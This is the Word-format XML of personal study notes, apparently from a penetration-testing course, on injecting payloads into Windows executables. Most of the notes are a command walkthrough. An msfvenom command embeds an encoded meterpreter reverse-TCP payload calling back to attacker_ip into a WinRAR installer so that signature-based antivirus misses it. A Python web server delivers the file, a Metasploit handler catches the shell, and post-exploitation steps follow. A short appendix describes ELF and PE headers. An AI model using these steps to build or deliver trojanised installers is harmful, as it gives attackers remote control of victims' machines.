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4A4AFB" w14:textId="592A6A4A" w:rsidR="00853ABF" w:rsidRPr="00C165A4" w:rsidRDefault="00C165A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C165A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injecting payloads into windows portable executables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E13F9" w14:textId="77777777" w:rsidR="00C165A4" w:rsidRDefault="00C165A4"/>
    <w:p w14:paraId="598D32A2" w14:textId="71250BEF" w:rsidR="00C165A4" w:rsidRDefault="00931940">
      <w:r>
        <w:t>To evade signature-based AV detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFE831E" w14:textId="77777777" w:rsidR="00931940" w:rsidRDefault="00931940"/>
    <w:p w14:paraId="018C0336" w14:textId="039BE05D" w:rsidR="00EB3426" w:rsidRDefault="00EB3426">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02E250B9" w14:textId="387C61C1" w:rsidR="00EB3426" w:rsidRDefault="00EB3426">
      <w:r>
        <w:t># show help manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386B419E" w14:textId="77777777" w:rsidR="00EB3426" w:rsidRDefault="00EB3426"/>
    <w:p w14:paraId="0FD429BC" w14:textId="1435C996" w:rsidR="00EB3426" w:rsidRDefault="0017470F">
      <w:r>
        <w:t># When you try to inject the payload into the legitimate executables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B390608" w14:textId="77777777" w:rsidR="0017470F" w:rsidRDefault="0017470F"/>
    <w:p w14:paraId="3CD5B985" w14:textId="6545D946" w:rsidR="0017470F" w:rsidRDefault="0017470F">
      <w:r>
        <w:t># Some portable executables may not allow for successful injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1A120D" w14:textId="287F75C4" w:rsidR="00EB3426" w:rsidRDefault="0017470F">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD09D07" w14:textId="1DCD1F20" w:rsidR="0017470F" w:rsidRDefault="0017470F">
      <w:r>
        <w:t># The best option in some cases is WinRAR executables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF37EC" w14:textId="77777777" w:rsidR="0017470F" w:rsidRDefault="0017470F"/>
    <w:p w14:paraId="00EE28D8" w14:textId="7379F716" w:rsidR="0017470F" w:rsidRDefault="0017470F">
      <w:r>
        <w:t xml:space="preserve">Download the setup file of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B34D199" w14:textId="33639547" w:rsidR="0017470F" w:rsidRDefault="0017470F">
      <w:r>
        <w:t>Now:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB4AA71" w14:textId="48BEA7FC" w:rsidR="0017470F" w:rsidRDefault="0017470F">
      <w:r>
        <w:t xml:space="preserve">Generate the payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CBDB04" w14:textId="7701404F" w:rsidR="0017470F" w:rsidRDefault="0017470F">
      <w:r>
        <w:t xml:space="preserve">Then inject in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB8A7B7" w14:textId="77777777" w:rsidR="0017470F" w:rsidRDefault="0017470F"/>
    <w:p w14:paraId="24628B62" w14:textId="4E65590E" w:rsidR="0017470F" w:rsidRDefault="0017470F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  LPORT=1234 -e =x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -I 10 -f exe -x  ~/Downloads/wrar.exe &gt; ~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/winrar.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C795CDE" w14:textId="557B1511" w:rsidR="0017470F" w:rsidRDefault="0017470F">
      <w:r>
        <w:t xml:space="preserve"># -x to inject the payload into </w:t>
      </w:r>
      <w:r>
        <w:t>legitimate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDEC8F8" w14:textId="77777777" w:rsidR="0017470F" w:rsidRDefault="0017470F"/>
    <w:p w14:paraId="1FE21565" w14:textId="6A6E41DE" w:rsidR="007B2ACB" w:rsidRDefault="000C5D27">
      <w:r>
        <w:t>Now transfer it to target system (</w:t>
      </w:r>
      <w:r>
        <w:t>winrar.exe</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7FE6EE" w14:textId="77777777" w:rsidR="000C5D27" w:rsidRDefault="000C5D27"/>
    <w:p w14:paraId="0E9B5062" w14:textId="53A94025" w:rsidR="000C5D27" w:rsidRDefault="000C5D27">
      <w:r>
        <w:t xml:space="preserve">Sudo python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>simpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F943095" w14:textId="77777777" w:rsidR="000C5D27" w:rsidRDefault="000C5D27"/>
    <w:p w14:paraId="1D49A021" w14:textId="76FB68C1" w:rsidR="000C5D27" w:rsidRDefault="000C5D27">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A8E4E7" w14:textId="77777777" w:rsidR="000C5D27" w:rsidRDefault="000C5D27">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B2D35" w14:textId="30BCA39E" w:rsidR="000C5D27" w:rsidRDefault="000C5D27">
      <w:r>
        <w:t>Set payload /windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65A1BD1E" w14:textId="00772069" w:rsidR="000C5D27" w:rsidRDefault="000C5D27">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1B47EB" w14:textId="0669EE91" w:rsidR="000C5D27" w:rsidRDefault="000C5D27">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E4FE4F8" w14:textId="4F0487C5" w:rsidR="000C5D27" w:rsidRDefault="000C5D27">
      <w:r>
        <w:t>Set LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561A4AF0" w14:textId="0961678C" w:rsidR="00C165A4" w:rsidRDefault="00B1510E">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4178A6C3" w14:textId="77777777" w:rsidR="00B1510E" w:rsidRDefault="00B1510E"/>
    <w:p w14:paraId="146718A9" w14:textId="0782419A" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:r>
        <w:t>Switch to window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011B83C" w14:textId="5BDA6825" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:r>
        <w:t>Visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D89E5" w14:textId="53B3BF19" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="001036BE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://attacker_ip/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64DA45C8" w14:textId="77777777" w:rsidR="00B1510E" w:rsidRDefault="00B1510E" w:rsidP="00B1510E">
      <w:r>
        <w:t>Download the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9AD702" w14:textId="74B0ED48" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:r>
        <w:t xml:space="preserve"># it shown and look like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> setup file. (when we click on it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> does not open the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> installation form it executes the payload only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A12B1" w14:textId="77777777" w:rsidR="00B1510E" w:rsidRDefault="00B1510E"/>
    <w:p w14:paraId="07990079" w14:textId="753FF57F" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:r>
        <w:t xml:space="preserve">You get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4642002B" w14:textId="64AEE82C" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD1E078" w14:textId="77777777" w:rsidR="00B1510E" w:rsidRDefault="00B1510E"/>
    <w:p w14:paraId="017CFE84" w14:textId="5E608DE3" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:r>
        <w:t xml:space="preserve"># when you get access in the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D7619">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client side attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the recommended thing is to run this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4389AF" w14:textId="2D27ACC4" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:r>
        <w:t xml:space="preserve"># it manages the process that current </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="003D7619">
        <w:t>running by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inject (payload) in</w:t>
      </w:r>
      <w:r w:rsidR="003D7619">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> other process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFFDA44" w14:textId="75EDECA6" w:rsidR="00B1510E" w:rsidRDefault="00B1510E">
      <w:r>
        <w:t>Run post/windows/manage/migrate/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F591151" w14:textId="77777777" w:rsidR="00B1510E" w:rsidRDefault="00B1510E"/>
    <w:p w14:paraId="234D379B" w14:textId="548A0542" w:rsidR="00B1510E" w:rsidRDefault="00383F63">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7942145C" w14:textId="77777777" w:rsidR="00383F63" w:rsidRDefault="00383F63"/>
    <w:p w14:paraId="2FB14714" w14:textId="77777777" w:rsidR="00C44B6D" w:rsidRDefault="00C44B6D"/>
    <w:p w14:paraId="168D7285" w14:textId="6CE5625C" w:rsidR="00C44B6D" w:rsidRDefault="00C44B6D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00C44B6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-k options:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> maintain the actual/original functionality of portable executable in which you are injecting the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35782881" w14:textId="7F508F6B" w:rsidR="00C44B6D" w:rsidRDefault="00C44B6D">
      <w:r>
        <w:t># This will not work for most of the executables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D59CCD" w14:textId="77777777" w:rsidR="00C44B6D" w:rsidRDefault="00C44B6D"/>
    <w:p w14:paraId="1EBADE03" w14:textId="13A2F7CE" w:rsidR="00C44B6D" w:rsidRDefault="00C44B6D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  LPORT=1234 -e =x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -I 10 -f exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00EE4A6E">
        <w:t>k -x ~</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/Downloads/wrar.exe </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows_payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/winrar</w:t>
      </w:r>
      <w:r>
        <w:t>-new</w:t>
      </w:r>
      <w:r>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED1E113" w14:textId="77777777" w:rsidR="00C44B6D" w:rsidRDefault="00C44B6D"/>
    <w:p w14:paraId="2B870873" w14:textId="007C16B0" w:rsidR="00B1510E" w:rsidRDefault="00EE4A6E">
      <w:r>
        <w:t># should give error because this exe</w:t>
      </w:r>
      <w:r w:rsidR="003D7619">
        <w:t xml:space="preserve"> does not have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the ability to inject the payload and retain original functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC6085" w14:textId="0D6EF81C" w:rsidR="00EE4A6E" w:rsidRDefault="00EE4A6E">
      <w:r>
        <w:t xml:space="preserve"># this require a lot of testing try a lot of the </w:t>
      </w:r>
      <w:r w:rsidR="0015737E">
        <w:t>various</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exe or setup files and see which one run</w:t>
      </w:r>
      <w:r w:rsidR="0015737E">
        <w:t xml:space="preserve"> correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399B8E89" w14:textId="77777777" w:rsidR="00EE4A6E" w:rsidRDefault="00EE4A6E"/>
    <w:p w14:paraId="6FE7EA3D" w14:textId="2929B738" w:rsidR="00EE4A6E" w:rsidRDefault="00EE4A6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE4A6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>These techniques are not really much used because the antivirus are much more advanced  and their signature based database are comprehensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8F884" w14:textId="77777777" w:rsidR="00C165A4" w:rsidRDefault="00C165A4"/>
    <w:p w14:paraId="35A95F41" w14:textId="3D5FC084" w:rsidR="007B2ACB" w:rsidRPr="007B2ACB" w:rsidRDefault="007B2ACB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B2ACB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FBB165" w14:textId="736DC2CF" w:rsidR="007B2ACB" w:rsidRDefault="007B2ACB" w:rsidP="007B2ACB">
      <w:r w:rsidRPr="007B2ACB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ELF </w:t>
      </w:r>
      <w:r w:rsidR="000E7E73" w:rsidRPr="000E7E73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(Executable and Linkable </w:t>
      </w:r>
      <w:r w:rsidR="000E7E73" w:rsidRPr="000E7E73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Format)</w:t>
      </w:r>
      <w:r w:rsidRPr="007B2ACB">
        <w:t xml:space="preserve"> used on Linux/Unix for executables, shared libraries and object files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A12302" w14:textId="40D5D4AE" w:rsidR="007B2ACB" w:rsidRDefault="007B2ACB" w:rsidP="007B2ACB">
      <w:r w:rsidRPr="007B2ACB">
        <w:t>Starts with \x7FELF</w:t>
      </w:r>
      <w:r w:rsidR="00FC32D3">
        <w:t>. (</w:t>
      </w:r>
      <w:r w:rsidR="00FC32D3" w:rsidRPr="00FC32D3">
        <w:t xml:space="preserve">mark the file as an </w:t>
      </w:r>
      <w:r w:rsidR="00FC32D3" w:rsidRPr="00FC32D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ELF binary</w:t>
      </w:r>
      <w:r w:rsidR="00FC32D3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF6C65E" w14:textId="7DC89FA3" w:rsidR="007B2ACB" w:rsidRPr="007B2ACB" w:rsidRDefault="007B2ACB" w:rsidP="007B2ACB">
      <w:r w:rsidRPr="007B2ACB">
        <w:t xml:space="preserve">inspect with file or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B2ACB">
        <w:t>readelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B2ACB">
        <w:t xml:space="preserve"> -h to see headers and sections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07EF08" w14:textId="533375C0" w:rsidR="007B2ACB" w:rsidRDefault="007B2ACB" w:rsidP="007B2ACB">
      <w:r w:rsidRPr="007B2ACB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">EXE / PE </w:t>
      </w:r>
      <w:r w:rsidR="000E7E73" w:rsidRPr="000E7E73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Portable Executable)</w:t>
      </w:r>
      <w:r w:rsidR="000E7E73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B2ACB">
        <w:t>Windows format for programs, DLLs and drivers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB64F49" w14:textId="74090614" w:rsidR="007B2ACB" w:rsidRDefault="007B2ACB" w:rsidP="007B2ACB">
      <w:r w:rsidRPr="007B2ACB">
        <w:t>Starts with MZ then a PE header</w:t>
      </w:r>
      <w:r w:rsidR="00FC32D3">
        <w:t>. (</w:t>
      </w:r>
      <w:r w:rsidR="00FC32D3" w:rsidRPr="00FC32D3">
        <w:t xml:space="preserve">It tells the OS loader </w:t>
      </w:r>
      <w:r w:rsidR="00FC32D3" w:rsidRPr="00FC32D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“this is an executable file”</w:t>
      </w:r>
      <w:r w:rsidR="00FC32D3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F24B9E0" w14:textId="13F50B11" w:rsidR="007B2ACB" w:rsidRPr="007B2ACB" w:rsidRDefault="007B2ACB" w:rsidP="007B2ACB">
      <w:r w:rsidRPr="007B2ACB">
        <w:t xml:space="preserve">check with file or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B2ACB">
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B2ACB">
        <w:t xml:space="preserve"> -x / Windows tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A4DD0" w14:textId="77777777" w:rsidR="007B2ACB" w:rsidRDefault="007B2ACB"/>
    <w:p w14:paraId="5A491559" w14:textId="77777777" w:rsidR="0017470F" w:rsidRDefault="0017470F"/>
    <w:sectPr w:rsidR="001747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11F7"/>
    <w:rsid w:val="000C5D27"/>
    <w:rsid w:val="000E7E73"/>
    <w:rsid w:val="0015737E"/>
    <w:rsid w:val="0017470F"/>
    <w:rsid w:val="00285DB2"/>
    <w:rsid w:val="002A11F7"/>
    <w:rsid w:val="00383F63"/>
    <w:rsid w:val="003C7217"/>
    <w:rsid w:val="003D7619"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="007148ED"/>
    <w:rsid w:val="007B2ACB"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00931940"/>
    <w:rsid w:val="00B1510E"/>
    <w:rsid w:val="00B4269A"/>
    <w:rsid w:val="00BC6237"/>
    <w:rsid w:val="00C14F81"/>
    <w:rsid w:val="00C165A4"/>
    <w:rsid w:val="00C44B6D"/>
    <w:rsid w:val="00EB3426"/>
    <w:rsid w:val="00EE4A6E"/>
    <w:rsid w:val="00FC3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1DC780"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B5CBF52-992C-4DB4-9378-227A3C8A15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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11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11F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1510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1510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attacker_i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3</Pages>
  <Words>381</Words>
  <Characters>2174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farooq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>umar farooq</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-04T08:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-04T08:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>